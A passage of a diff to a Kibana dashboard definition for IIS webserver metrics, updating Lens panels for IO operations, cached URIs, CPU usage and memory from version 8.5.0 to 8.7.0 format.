"type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d281f47d-1e36-4ab1-be8c-5f6d11e38479", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "53550c84-3d37-4bfe-9059-5cc839edce4c": { - "columnOrder": [ - "90c65dab-0b07-48bf-8c3a-c8d64037f66b", - "b602b162-ab23-4b52-87b7-48580e710e04" - ], - "columns": { - "90c65dab-0b07-48bf-8c3a-c8d64037f66b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "b602b162-ab23-4b52-87b7-48580e710e04": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "IO Write Operations/s", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.io_write_operations_per_sec" - } - }, - "incompleteColumns": {} - }, - "d281f47d-1e36-4ab1-be8c-5f6d11e38479": { - "columnOrder": [ - "6fc74322-ff38-45fd-94bd-04e683578e20", - "ca48fc8d-6ced-44a4-ada8-78faa367cba4" - ], - "columns": { - "6fc74322-ff38-45fd-94bd-04e683578e20": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ca48fc8d-6ced-44a4-ada8-78faa367cba4": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "IO Read Operations/s", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": 
"iis.webserver.process.io_read_operations_per_sec" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "ca48fc8d-6ced-44a4-ada8-78faa367cba4" - ], - "layerId": "d281f47d-1e36-4ab1-be8c-5f6d11e38479", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "6fc74322-ff38-45fd-94bd-04e683578e20", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(252,196,0,1)", - "forAccessor": "ca48fc8d-6ced-44a4-ada8-78faa367cba4" - } - ] - }, - { - "accessors": [ - "b602b162-ab23-4b52-87b7-48580e710e04" - ], - "layerId": "53550c84-3d37-4bfe-9059-5cc839edce4c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "90c65dab-0b07-48bf-8c3a-c8d64037f66b", - "yConfig": [ - { - "axisMode": "left", - "color": "#68BC00", - "forAccessor": "b602b162-ab23-4b52-87b7-48580e710e04" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + 
"accessors": [ + "ca48fc8d-6ced-44a4-ada8-78faa367cba4" + ], + "layerId": "d281f47d-1e36-4ab1-be8c-5f6d11e38479", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "6fc74322-ff38-45fd-94bd-04e683578e20", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(252,196,0,1)", + "forAccessor": "ca48fc8d-6ced-44a4-ada8-78faa367cba4" + } + ] + }, + { + "accessors": [ + "b602b162-ab23-4b52-87b7-48580e710e04" + ], + "layerId": "53550c84-3d37-4bfe-9059-5cc839edce4c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "seriesType": "line", + "xAccessor": "90c65dab-0b07-48bf-8c3a-c8d64037f66b", + "yConfig": [ + { + "axisMode": "left", + "color": "#68BC00", + "forAccessor": "b602b162-ab23-4b52-87b7-48580e710e04" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true }, - "gridData": { - "h": 12, - "i": "c805cba0-cce2-4c3a-8626-492958427932", - "w": 38, - "x": 10, - "y": 11 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "c805cba0-cce2-4c3a-8626-492958427932", - "title": "IO Operations", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd": { - "columnOrder": [ - "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec", - "cff61a8f-0ede-4904-b9b0-835bf244ef48", - "cff61a8f-0ede-4904-b9b0-835bf244ef48X0", - "cff61a8f-0ede-4904-b9b0-835bf244ef48X1" - ], - "columns": { - "cff61a8f-0ede-4904-b9b0-835bf244ef48": { - "dataType": "number", - 
"isBucketed": false, - "label": "overall_max(last_value(iis.webserver.cache.current_uris_cached))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.cache.current_uris_cached))", - "isFormulaBroken": false - }, - "references": [ - "cff61a8f-0ede-4904-b9b0-835bf244ef48X1" - ], - "scale": "ratio" - }, - "cff61a8f-0ede-4904-b9b0-835bf244ef48X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.current_uris_cached: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.current_uris_cached))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.current_uris_cached" - }, - "cff61a8f-0ede-4904-b9b0-835bf244ef48X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.current_uris_cached))", - "operationType": "overall_max", - "references": [ - "cff61a8f-0ede-4904-b9b0-835bf244ef48X0" - ], - "scale": "ratio" - }, - "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.current_uris_cached: *" - }, - "isBucketed": false, - "label": "Current Uris Cached", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.current_uris_cached" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#D31569", - "layerId": "7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", - "layerType": "data", - "maxAccessor": "cff61a8f-0ede-4904-b9b0-835bf244ef48", - "metricAccessor": "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec", - "progressDirection": "horizontal" - } - }, - "title": "", - 
"type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 9, - "i": "90575b21-d32b-46c4-a798-a2919f4f9129", - "w": 5, - "x": 0, - "y": 14 + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" }, - "panelIndex": "90575b21-d32b-46c4-a798-a2919f4f9129", - "title": "Current Uris Cached", - "type": "lens", - "version": "8.5.0" + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-fa377d0e-caba-4a88-a021-da76b4140636", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "fa377d0e-caba-4a88-a021-da76b4140636": { - "columnOrder": [ - "49cc7bbf-35d0-4177-a236-358fa3a5bb95", - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0", - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0", - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1" - ], - "columns": { - "49cc7bbf-35d0-4177-a236-358fa3a5bb95": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.total_uris_cached: *" - }, - "isBucketed": false, - "label": "Total Uris Cached", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.total_uris_cached" - }, - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.cache.total_uris_cached))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.cache.total_uris_cached))", - "isFormulaBroken": false - }, - "references": [ - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1" - ], - "scale": "ratio" - }, - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0": { - "customLabel": true, - "dataType": 
"number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.total_uris_cached: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.total_uris_cached))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.total_uris_cached" - }, - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.total_uris_cached))", - "operationType": "overall_max", - "references": [ - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#5C15D3", - "layerId": "fa377d0e-caba-4a88-a021-da76b4140636", - "layerType": "data", - "maxAccessor": "bd3ce0f6-6a03-4d37-83cf-8524197b62a0", - "metricAccessor": "49cc7bbf-35d0-4177-a236-358fa3a5bb95", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "IO Operations" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "90575b21-d32b-46c4-a798-a2919f4f9129", + "w": 5, + "x": 0, + "y": 14 + }, + "panelIndex": "90575b21-d32b-46c4-a798-a2919f4f9129", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd": { + "columnOrder": [ + "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec", + "cff61a8f-0ede-4904-b9b0-835bf244ef48", + "cff61a8f-0ede-4904-b9b0-835bf244ef48X0", + 
"cff61a8f-0ede-4904-b9b0-835bf244ef48X1" + ], + "columns": { + "cff61a8f-0ede-4904-b9b0-835bf244ef48": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.cache.current_uris_cached))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.cache.current_uris_cached))", + "isFormulaBroken": false + }, + "references": [ + "cff61a8f-0ede-4904-b9b0-835bf244ef48X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 9, - "i": "00e3504a-5841-41ee-bdf6-e9e2633da51c", - "w": 5, - "x": 5, - "y": 14 - }, - "panelIndex": "00e3504a-5841-41ee-bdf6-e9e2633da51c", - "title": "Total Uris Cached", - "type": "lens", - "version": "8.5.0" + "cff61a8f-0ede-4904-b9b0-835bf244ef48X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.current_uris_cached: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.current_uris_cached))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.current_uris_cached" + }, + "cff61a8f-0ede-4904-b9b0-835bf244ef48X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.current_uris_cached))", + "operationType": "overall_max", + "references": [ + "cff61a8f-0ede-4904-b9b0-835bf244ef48X0" + ], + "scale": "ratio" + }, + "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.current_uris_cached: *" + }, + "isBucketed": false, + "label": "Current Uris Cached", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": 
"iis.webserver.cache.current_uris_cached" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#D31569", + "layerId": "7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", + "layerType": "data", + "maxAccessor": "cff61a8f-0ede-4904-b9b0-835bf244ef48", + "metricAccessor": "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8899c952-5940-4065-9cdb-5198d4d8c1f9", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "8899c952-5940-4065-9cdb-5198d4d8c1f9": { - "columnOrder": [ - "29da561e-8e3d-4182-b6cd-5c63ddbda0e3", - "bdb43cdc-5f64-43cd-8315-af9627e10b00" - ], - "columns": { - "29da561e-8e3d-4182-b6cd-5c63ddbda0e3": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "bdb43cdc-5f64-43cd-8315-af9627e10b00": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "CPU Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.cpu_usage_perc" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - 
"labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "bdb43cdc-5f64-43cd-8315-af9627e10b00" - ], - "layerId": "8899c952-5940-4065-9cdb-5198d4d8c1f9", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "29da561e-8e3d-4182-b6cd-5c63ddbda0e3", - "yConfig": [ - { - "axisMode": "left", - "color": "#3185FC", - "forAccessor": "bdb43cdc-5f64-43cd-8315-af9627e10b00" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Current Uris Cached" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "00e3504a-5841-41ee-bdf6-e9e2633da51c", + "w": 5, + "x": 5, + "y": 14 + }, + "panelIndex": "00e3504a-5841-41ee-bdf6-e9e2633da51c", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-fa377d0e-caba-4a88-a021-da76b4140636", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fa377d0e-caba-4a88-a021-da76b4140636": { + "columnOrder": [ + "49cc7bbf-35d0-4177-a236-358fa3a5bb95", + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0", + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0", + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1" + ], + "columns": { + "49cc7bbf-35d0-4177-a236-358fa3a5bb95": { + "customLabel": true, + "dataType": "number", + 
"filter": { + "language": "kuery", + "query": "iis.webserver.cache.total_uris_cached: *" + }, + "isBucketed": false, + "label": "Total Uris Cached", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.total_uris_cached" + }, + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.cache.total_uris_cached))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.cache.total_uris_cached))", + "isFormulaBroken": false + }, + "references": [ + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.total_uris_cached: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.total_uris_cached))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.total_uris_cached" + }, + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.total_uris_cached))", + "operationType": "overall_max", + "references": [ + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#5C15D3", + "layerId": "fa377d0e-caba-4a88-a021-da76b4140636", + "layerType": "data", + "maxAccessor": "bd3ce0f6-6a03-4d37-83cf-8524197b62a0", + "metricAccessor": "49cc7bbf-35d0-4177-a236-358fa3a5bb95", + "progressDirection": "horizontal" + } + }, + 
"title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Uris Cached" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "73429e76-7391-4cb0-94d4-6a7f0eae0803", + "w": 24, + "x": 0, + "y": 23 + }, + "panelIndex": "73429e76-7391-4cb0-94d4-6a7f0eae0803", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8899c952-5940-4065-9cdb-5198d4d8c1f9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8899c952-5940-4065-9cdb-5198d4d8c1f9": { + "columnOrder": [ + "29da561e-8e3d-4182-b6cd-5c63ddbda0e3", + "bdb43cdc-5f64-43cd-8315-af9627e10b00" + ], + "columns": { + "29da561e-8e3d-4182-b6cd-5c63ddbda0e3": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdb43cdc-5f64-43cd-8315-af9627e10b00": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "CPU Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 1 + } + } + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.cpu_usage_perc" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + 
"accessors": [ + "bdb43cdc-5f64-43cd-8315-af9627e10b00" + ], + "layerId": "8899c952-5940-4065-9cdb-5198d4d8c1f9", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "seriesType": "line", + "xAccessor": "29da561e-8e3d-4182-b6cd-5c63ddbda0e3", + "yConfig": [ + { + "axisMode": "left", + "color": "#3185FC", + "forAccessor": "bdb43cdc-5f64-43cd-8315-af9627e10b00" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 15, - "i": "73429e76-7391-4cb0-94d4-6a7f0eae0803", - "w": 24, - "x": 0, - "y": 23 + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" }, - "panelIndex": "73429e76-7391-4cb0-94d4-6a7f0eae0803", - "title": "CPU Usage", - "type": "lens", - "version": "8.5.0" + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2cc87279-fd94-4e95-ab66-ab2585b855c5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-317f3825-6707-4b9b-af65-dc79a25e6360", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU Usage" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "049042c8-335a-4a0f-834b-97d2fa0efc62", + "w": 24, + "x": 24, + "y": 23 + }, + "panelIndex": "049042c8-335a-4a0f-834b-97d2fa0efc62", + 
"embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2cc87279-fd94-4e95-ab66-ab2585b855c5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-317f3825-6707-4b9b-af65-dc79a25e6360", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2cc87279-fd94-4e95-ab66-ab2585b855c5": { + "columnOrder": [ + "f5f6b376-3047-4471-9f0c-f615b00f961e", + "c8b59433-2924-4437-a385-60c9bc32a310" + ], + "columns": { + "c8b59433-2924-4437-a385-60c9bc32a310": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Virtual Bytes", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "2cc87279-fd94-4e95-ab66-ab2585b855c5": { - "columnOrder": [ - "f5f6b376-3047-4471-9f0c-f615b00f961e", - "c8b59433-2924-4437-a385-60c9bc32a310" - ], - "columns": { - "c8b59433-2924-4437-a385-60c9bc32a310": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Virtual Bytes", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.virtual_bytes" - }, - "f5f6b376-3047-4471-9f0c-f615b00f961e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - 
"317f3825-6707-4b9b-af65-dc79a25e6360": { - "columnOrder": [ - "a59431a7-a573-4899-addd-60959bcbb420", - "a97dceba-f368-47fb-b537-af02cd8ab7e1" - ], - "columns": { - "a59431a7-a573-4899-addd-60959bcbb420": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "a97dceba-f368-47fb-b537-af02cd8ab7e1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Working Set", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.working_set" - } - }, - "incompleteColumns": {} - }, - "abc76e4a-ddb7-4d6a-9cfb-041f1cf17535": { - "columnOrder": [ - "26de4342-767f-4b20-b407-1103af88a599", - "5d68f5c0-defb-4876-b833-3a96972af5b9" - ], - "columns": { - "26de4342-767f-4b20-b407-1103af88a599": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "5d68f5c0-defb-4876-b833-3a96972af5b9": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Private Bytes", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.private_bytes" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - 
"gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "5d68f5c0-defb-4876-b833-3a96972af5b9" - ], - "layerId": "abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "26de4342-767f-4b20-b407-1103af88a599", - "yConfig": [ - { - "axisMode": "left", - "color": "#3185FC", - "forAccessor": "5d68f5c0-defb-4876-b833-3a96972af5b9" - } - ] - }, - { - "accessors": [ - "c8b59433-2924-4437-a385-60c9bc32a310" - ], - "layerId": "2cc87279-fd94-4e95-ab66-ab2585b855c5", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "f5f6b376-3047-4471-9f0c-f615b00f961e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68BC00", - "forAccessor": "c8b59433-2924-4437-a385-60c9bc32a310" - } - ] - }, - { - "accessors": [ - "a97dceba-f368-47fb-b537-af02cd8ab7e1" - ], - "layerId": "317f3825-6707-4b9b-af65-dc79a25e6360", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "a59431a7-a573-4899-addd-60959bcbb420", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(149,0,188,1)", - "forAccessor": "a97dceba-f368-47fb-b537-af02cd8ab7e1" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - 